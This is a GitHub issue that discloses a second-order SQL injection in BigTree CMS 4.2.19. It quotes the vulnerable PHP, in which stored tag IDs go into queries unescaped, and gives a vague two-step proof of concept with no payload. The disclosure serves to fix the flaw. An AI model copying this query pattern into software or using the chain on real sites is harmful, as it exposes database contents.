You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Good day.
I found a SQL injection vulnerability in BigTree CMS through 4.2.19.This vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database.
--
file in admin/ajax/dashboard/approve-change.php
$change = $admin->getPendingChange($_POST["id"]);
// See if we have permission.
$item_id = $change["item_id"] ? $change["item_id"] : "p".$change["id"];
if ($change["module"]) {
// It's a module. Check permissions on this.
$data = BigTreeAutoModule::getPendingItem($change["table"],$item_id);
$permission_level = $admin->getAccessLevel($admin->getModule($change["module"]),$data["item"],$change["table"]);
exit();
}
file:
core/inc/auto-modules.php
static function getPendingItem($table,$id) {
$status = "published";
$many_to_many = array();
$owner = false;
// The entry is pending if there's a "p" prefix on the id
if (substr($id,0,1) == "p") {
$change = sqlfetch(sqlquery("SELECT * FROM bigtree_pending_changes WHERE id = '".sqlescape(substr($id,1))."'"));
if (!$change) {
return false;
}
$item = json_decode($change["changes"],true);
$many_to_many = json_decode($change["mtm_changes"],true);
$temp_tags = json_decode($change["tags_changes"],true);
$tags = array();
if (!empty($temp_tags)) {
foreach ($temp_tags as $tid) {
$tags[] = sqlfetch(sqlquery("SELECT * FROM bigtree_tags WHERE id = '$tid'"));
}
}
$status = "pending";
$owner = $change["user"];
// Otherwise it's a live entry
} else {
$id = sqlescape($id);
$item = sqlfetch(sqlquery("SELECT * FROM `$table` WHERE id = '$id'"));
if (!$item) {
return false;
}
// Apply changes that are pending
$change = sqlfetch(sqlquery("SELECT * FROM bigtree_pending_changes WHERE `table` = '$table' AND `item_id` = '$id'"));
if ($change) {
$status = "updated";
$changes = json_decode($change["changes"],true);
foreach ($changes as $key => $val) {
$item[$key] = $val;
}
$many_to_many = json_decode($change["mtm_changes"],true);
$temp_tags = json_decode($change["tags_changes"],true);
$tags = array();
var_dump($change);
exit();
if (is_array($temp_tags)) {
foreach ($temp_tags as $tid) {
$tags[] = sqlfetch(sqlquery("SELECT * FROM bigtree_tags WHERE id = '$tid'"));
}
}
// If there's no pending changes, just pull the tags
} else {
$tags = self::getTagsForEntry($table,$id);
}
}
// Process the internal page links, turn json_encoded arrays into arrays.
foreach ($item as $key => $val) {
if (is_array($val)) {
$item[$key] = BigTree::untranslateArray($val);
} elseif (is_array(json_decode($val,true))) {
$item[$key] = BigTree::untranslateArray(json_decode($val,true));
} else {
$item[$key] = BigTreeCMS::replaceInternalPageLinks($val);
}
}
return array("item" => $item, "mtm" => $many_to_many, "tags" => $tags, "status" => $status, "owner" => $owner);
}
values of the temp_tags parameters are not sanitized; and it is taken out of the database.
so ,We can insert an attack statement into the table ,then access this point to complete the attack chain
#SQL injection in BigTree-CMS 4.2.19
--
file in admin/ajax/dashboard/approve-change.php
file:
core/inc/auto-modules.php
values of the temp_tags parameters are not sanitized; and it is taken out of the database.
so ,We can insert an attack statement into the table ,then access this point to complete the attack chain
--
Poc:
at first, add a trees
then,request the url leads to sqli
if there are any questions, please send me the details to my email at xc0161@gmail.com
The text was updated successfully, but these errors were encountered: